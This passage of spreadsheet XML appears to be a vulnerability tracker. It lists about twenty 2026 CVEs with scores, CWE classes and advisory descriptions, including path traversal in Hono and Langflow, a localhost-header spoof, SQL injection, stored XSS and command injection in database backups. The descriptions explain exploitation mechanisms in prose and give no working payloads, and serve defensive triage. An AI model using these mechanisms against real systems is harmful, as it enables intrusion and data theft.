          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 4.12.12 until 4.13.5, the fix released for CVE-2026-39408 does not cover every traversal sequence, and toSSG() can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments. Static site generation builds each output path from the route path and values supplied through ssgParams, then verifies that the result stays inside the output directory using the same normalization routine that built the path. That routine does not fully collapse runs of consecutive parent-directory segments, allowing a path that the check accepts to resolve outside the output directory, and the check also treats output directories that differ in how they are rooted as equivalent. This arises when an application generates a static site from route parameter values it does not fully control, such as slugs from a CMS, API, or user submission. An untrusted ssgParams value can create or overwrite files elsewhere in the build environment and alter generated artifacts or deployment output. The vulnerability affects build-time static site generation only; request-time routing and applications with entirely developer-controlled ssgParams values are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="M1578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t>
        </is>
      </c>
    </row>
    <row r="1579">
      <c r="A1579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84391</t>
        </is>
      </c>
      <c r="C1579" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1579" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1579" s="5" t="inlineStr"/>
      <c r="F1579" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1579" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1579" s="5" t="inlineStr"/>
      <c r="I1579" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1579" s="5" t="inlineStr"/>
      <c r="K1579" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="L1579" s="5" t="inlineStr">
        <is>
          <t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M1579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t>
        </is>
      </c>
    </row>
    <row r="1580">
      <c r="A1580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86332</t>
        </is>
      </c>
      <c r="C1580" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1580" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1580" s="5" t="inlineStr"/>
      <c r="F1580" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1580" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H1580" s="5" t="inlineStr"/>
      <c r="I1580" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1580" s="5" t="inlineStr"/>
      <c r="K1580" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1580" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in odh-dashboard in Red Hat OpenShift AI. The backend-for-frontend route GET /api/nim-serving/:nimResource reads Kubernetes Secrets using the dashboard service account and returns the full Secret object, including .data, without an authorization check. Any authenticated dashboard user can retrieve the cluster NVIDIA NGC API key Secret (apiKeySecret) and the NIM image pull secret (nimPullSecret). Create and delete of the same NIM credential are admin-gated; the read path is not. This is missing authorization (CWE-862) and insufficiently protected credentials (CWE-522). It is distinct from CVE-2026-5483 (service-account token leak in the Kubernetes client response wrapper on the same route) and CVE-2026-16456 (odh-model-controller cross-namespace confused deputy).</t>
        </is>
      </c>
      <c r="M1580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86332</t>
        </is>
      </c>
    </row>
    <row r="1581">
      <c r="A1581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86550</t>
        </is>
      </c>
      <c r="C1581" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1581" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1581" s="5" t="inlineStr"/>
      <c r="F1581" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1581" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1581" s="5" t="inlineStr"/>
      <c r="I1581" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1581" s="5" t="inlineStr"/>
      <c r="K1581" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1581" s="5" t="inlineStr">
        <is>
          <t>NuBrowser lacks protocol whitelist validation for the S.browser_fallback_url field of intent://, allowing attackers to inject javascript: URLs via 302 redirects. This results in a universal cross‑site scripting (UXSS) vulnerability that enables script execution within the origin of arbitrary websites.</t>
        </is>
      </c>
      <c r="M1581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86550</t>
        </is>
      </c>
    </row>
    <row r="1582">
      <c r="A1582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86597</t>
        </is>
      </c>
      <c r="C1582" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1582" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1582" s="5" t="inlineStr"/>
      <c r="F1582" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1582" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H1582" s="5" t="inlineStr"/>
      <c r="I1582" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1582" s="5" t="inlineStr"/>
      <c r="K1582" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1582" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into log files in the Snowflake Python, Go, JDBC, Node.js, PHP PDO, and ODBC drivers allowed authentication tokens, query-result encryption keys, pre-signed cloud-storage URLs, and SAML assertions to be written to diagnostic logs in circumstances where the available log redaction did not cover all affected log paths and data types. An attacker with read access to the log destination, whether the local filesystem, a log aggregation service, or a CI/CD artifact store, could obtain credentials and decryption keys that, if still valid at the time of access, could be used to authenticate to the corresponding Snowflake account or cloud-storage object. Successful exploitation requires read access to the log destination, and impact is bounded by credential lifetime and object scope. The fix is available in Snowflake Connector for Python v4.7.3, Snowflake Go Driver v2.2.0, Snowflake JDBC Driver v4.3.4 (including the snowflake-jdbc-fips and snowflake-jdbc-thin), Snowflake Node.js Driver v3.3.0, Snowflake PHP PDO Driver v4.2.0, and Snowflake ODBC Driver v3.20.0. Users must manually upgrade and should securely delete previously generated diagnostic logs containing sensitive information where retention is not required.</t>
        </is>
      </c>
      <c r="M1582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86597</t>
        </is>
      </c>
    </row>
    <row r="1583">
      <c r="A1583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87454</t>
        </is>
      </c>
      <c r="C1583" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1583" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1583" s="5" t="inlineStr"/>
      <c r="F1583" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1583" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1583" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1583" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1583" s="5" t="inlineStr"/>
      <c r="K1583" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1583" s="5" t="inlineStr">
        <is>
          <t>Information leak in Enterprise in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87454</t>
        </is>
      </c>
    </row>
    <row r="1584">
      <c r="A1584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9138</t>
        </is>
      </c>
      <c r="C1584" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1584" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1584" s="5" t="inlineStr"/>
      <c r="F1584" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1584" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1584" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1584" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1584" s="5" t="inlineStr"/>
      <c r="K1584" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1584" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 Langflow could allow an authenticated attacker to write arbitrary files to the server due to improper input validation in the SaveToFileComponent. The application constructs local file paths using attacker‑controlled input without sufficient sanitization when handling requests to the /api/v1/run/{flow_id} endpoint. An attacker with low‑privileged authenticated access (such as a valid API key or user session) can supply crafted path values, including absolute paths or path traversal sequences, allowing arbitrary file writes to locations writable by the Langflow process. Successful exploitation may lead to unauthorized file creation or modification, potentially resulting in further compromise depending on the deployment environment.</t>
        </is>
      </c>
      <c r="M1584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9138</t>
        </is>
      </c>
    </row>
    <row r="1585">
      <c r="A1585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9186</t>
        </is>
      </c>
      <c r="C1585" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1585" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1585" s="5" t="inlineStr"/>
      <c r="F1585" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1585" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1585" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1585" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1585" s="5" t="inlineStr"/>
      <c r="K1585" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1585" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 allows remote authenticated attackers to bypass localhost-only MCP configuration installation by spoofing X-Forwarded-For: 127.0.0.1 header, enabling arbitrary writes to IDE config files (~/.cursor/mcp.json, etc.).</t>
        </is>
      </c>
      <c r="M1585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9186</t>
        </is>
      </c>
    </row>
    <row r="1586">
      <c r="A1586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9225</t>
        </is>
      </c>
      <c r="C1586" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1586" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1586" s="5" t="inlineStr"/>
      <c r="F1586" s="5" t="inlineStr"/>
      <c r="G1586" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1586" s="5" t="inlineStr"/>
      <c r="I1586" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1586" s="5" t="inlineStr"/>
      <c r="K1586" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1586" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 Langflow could allow an authenticated attacker to access sensitive files belonging to other users due to improper access control in the File/Read File component. When executing flows through the /api/v1/run/advanced/{flow_id} endpoint, the application allows component inputs to reference storage paths using arbitrary user or flow identifiers without verifying ownership. An attacker with low‑privileged authenticated access can supply a crafted file path pointing to another user’s storage namespace, causing the backend to read and return the contents of files uploaded by other users. This vulnerability bypasses intended authorization checks enforced by the file management API and may result in unauthorized disclosure of sensitive user data.</t>
        </is>
      </c>
      <c r="M1586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9225</t>
        </is>
      </c>
    </row>
    <row r="1587">
      <c r="A1587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9336</t>
        </is>
      </c>
      <c r="C1587" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1587" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1587" s="5" t="inlineStr"/>
      <c r="F1587" s="5" t="inlineStr"/>
      <c r="G1587" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H1587" s="5" t="inlineStr"/>
      <c r="I1587" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1587" s="5" t="inlineStr"/>
      <c r="K1587" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1587"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M1587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9336</t>
        </is>
      </c>
    </row>
    <row r="1588">
      <c r="A1588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9745</t>
        </is>
      </c>
      <c r="C1588" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1588" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1588" s="5" t="inlineStr"/>
      <c r="F1588" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1588" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1588" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I1588" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1588" s="5" t="inlineStr"/>
      <c r="K1588" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L1588" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 has operations that are performed without validating bucket ownership using the ExpectedBucketOwner parameter. This omission may allow a remote attacker to exploit misconfigurations or naming collisions to redirect application requests to an unintended S3 bucket under their control.</t>
        </is>
      </c>
      <c r="M1588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9745</t>
        </is>
      </c>
    </row>
    <row r="1589">
      <c r="A1589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19634</t>
        </is>
      </c>
      <c r="C1589" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1589" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1589" s="5" t="inlineStr"/>
      <c r="F1589" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1589" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1589" s="5" t="inlineStr"/>
      <c r="I1589" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1589" s="5" t="inlineStr"/>
      <c r="K1589" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1589" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a SQL injection vulnerability in two import functions. A user can create a malicious JSON document containing specially crafted object names. If a superuser subsequently calls anon.import_database_rules() or anon.import_roles_rules(), the malicious code is executed with superuser privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later</t>
        </is>
      </c>
      <c r="M1589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19634</t>
        </is>
      </c>
    </row>
    <row r="1590">
      <c r="A1590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3853</t>
        </is>
      </c>
      <c r="C1590" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1590" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1590" s="5" t="inlineStr"/>
      <c r="F1590" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1590" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1590" s="5" t="inlineStr"/>
      <c r="I1590" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1590" s="5" t="inlineStr"/>
      <c r="K1590" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1590" s="5" t="inlineStr">
        <is>
          <t>The Divi theme for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the `image_src` attribute of the `et_pb_video_slider_item` shortcode in all versions up to, and including, 4.27.6. This is due to the `image_src` field not being included in the `$url_options` whitelist (which only contains `url`, `button_link`, `button_url`), so it never receives `esc_url_raw()` at save time. On the server side, the value is rendered into a `data-image` HTML attribute using `esc_attr()`, which encodes double quotes as `&amp;quot;`. However, the client-side JavaScript carousel code in `custom.unified.js` reads this attribute using jQuery's `.data('image')`, which returns the browser-decoded value (with `&amp;quot;` decoded back to `"`). The decoded value is then concatenated directly into an HTML string and injected into the DOM via `jQuery.after()` without re-escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user hovers over the carousel thumbnail.</t>
        </is>
      </c>
      <c r="M1590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3853</t>
        </is>
      </c>
    </row>
    <row r="1591">
      <c r="A1591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54743</t>
        </is>
      </c>
      <c r="C1591" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1591" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1591" s="5" t="inlineStr"/>
      <c r="F1591" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1591" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1591" s="5" t="inlineStr"/>
      <c r="I1591" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1591" s="5" t="inlineStr"/>
      <c r="K1591" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1591" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. Prior to lemmy-ui 0.19.19-beta.1, LemmyNet/lemmy-ui renders Markdown in src/shared/markdown.ts for post bodies, comment bodies, private messages, and community and site sidebars through mdToHtml, which returns a raw __html object that Inferno injects without a sanitizer pass. setupMarkdown configures html as false but registers markdown-it-html5-embed@1.0.0 with useImageSyntax enabled, so an image targeting video media becomes a video element whose fallback incorporates the image alt text through unescaped string replacement. The html setting does not apply to plugin-generated output, allowing crafted alt text to reach the DOM as live HTML in contexts that do not use mdToHtmlNoImages. An approved member or a remote federated instance can store such content, and a viewer who renders it may execute JavaScript in the lemmy-ui origin, exposing the viewer's session and authenticated actions. The advisory notes that Content Security Policy prevents the described exploit in production, but also states that the tested default self-hosted deployment serves no Content-Security-Policy. This issue is fixed in lemmy-ui version 0.19.19-beta.1.</t>
        </is>
      </c>
      <c r="M1591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54743</t>
        </is>
      </c>
    </row>
    <row r="1592">
      <c r="A1592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66760</t>
        </is>
      </c>
      <c r="C1592" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1592" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1592" s="5" t="inlineStr"/>
      <c r="F1592" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1592" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1592" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1592" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1592" s="5" t="inlineStr"/>
      <c r="K1592" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1592" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not correctly validate client certificates in certain callback flows. An attacker with low privileges, holding a certificate from the same trusted authority with matching subject values, could bypass the identity check. This complexity makes the attack difficult to execute. Successful exploitation could allow impersonation of a trusted internal component, resulting in a high impact on integrity and a low impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M1592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66760</t>
        </is>
      </c>
    </row>
    <row r="1593">
      <c r="A1593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69878</t>
        </is>
      </c>
      <c r="C1593" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1593" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1593" s="5" t="inlineStr"/>
      <c r="F1593" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1593" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1593" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1593" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1593" s="5" t="inlineStr"/>
      <c r="K1593" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1593" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t>
        </is>
      </c>
    </row>
    <row r="1594">
      <c r="A1594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70582</t>
        </is>
      </c>
      <c r="C1594" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1594" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1594" s="5" t="inlineStr"/>
      <c r="F1594" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1594" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1594" s="5" t="inlineStr"/>
      <c r="I1594" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1594" s="5" t="inlineStr"/>
      <c r="K1594" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1594" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70582</t>
        </is>
      </c>
    </row>
    <row r="1595">
      <c r="A1595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71338</t>
        </is>
      </c>
      <c r="C1595" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1595" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1595" s="5" t="inlineStr"/>
      <c r="F1595" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1595" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1595" s="5" t="inlineStr"/>
      <c r="I1595" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1595" s="5" t="inlineStr"/>
      <c r="K1595" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1595" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t>
        </is>
      </c>
    </row>
    <row r="1596">
      <c r="A1596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72881</t>
        </is>
      </c>
      <c r="C1596" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1596" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1596" s="5" t="inlineStr"/>
      <c r="F1596" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1596" s="5" t="inlineStr">
        <is>
          <t>postgresql, mysql, mongodb</t>
        </is>
      </c>
      <c r="H1596" s="5" t="inlineStr"/>
      <c r="I1596" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1596" s="5" t="inlineStr"/>
      <c r="K1596" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1596" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, database backup and restore command builders in packages/server/src/utils/backups/utils.ts and packages/server/src/utils/restore/utils.ts interpolate database names, usernames, and passwords into nested shell command strings passed to child_process.exec(). An authenticated administrator with permission to create databases and configure backups can use crafted database configuration fields to execute arbitrary commands inside PostgreSQL, MariaDB, MySQL, MongoDB, or LibSQL containers, exposing database data and credentials and potentially enabling escape when a container is overprivileged. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72881</t>
        </is>
      </c>
    </row>
    <row r="1597">
      <c r="A1597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72947</t>
        </is>
      </c>
      <c r="C1597" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1597" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1597" s="5" t="inlineStr"/>
      <c r="F1597" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1597" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1597" s="5" t="inlineStr"/>
      <c r="I1597" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1597" s="5" t="inlineStr"/>
      <c r="K1597" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L1597" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72947</t>
        </is>
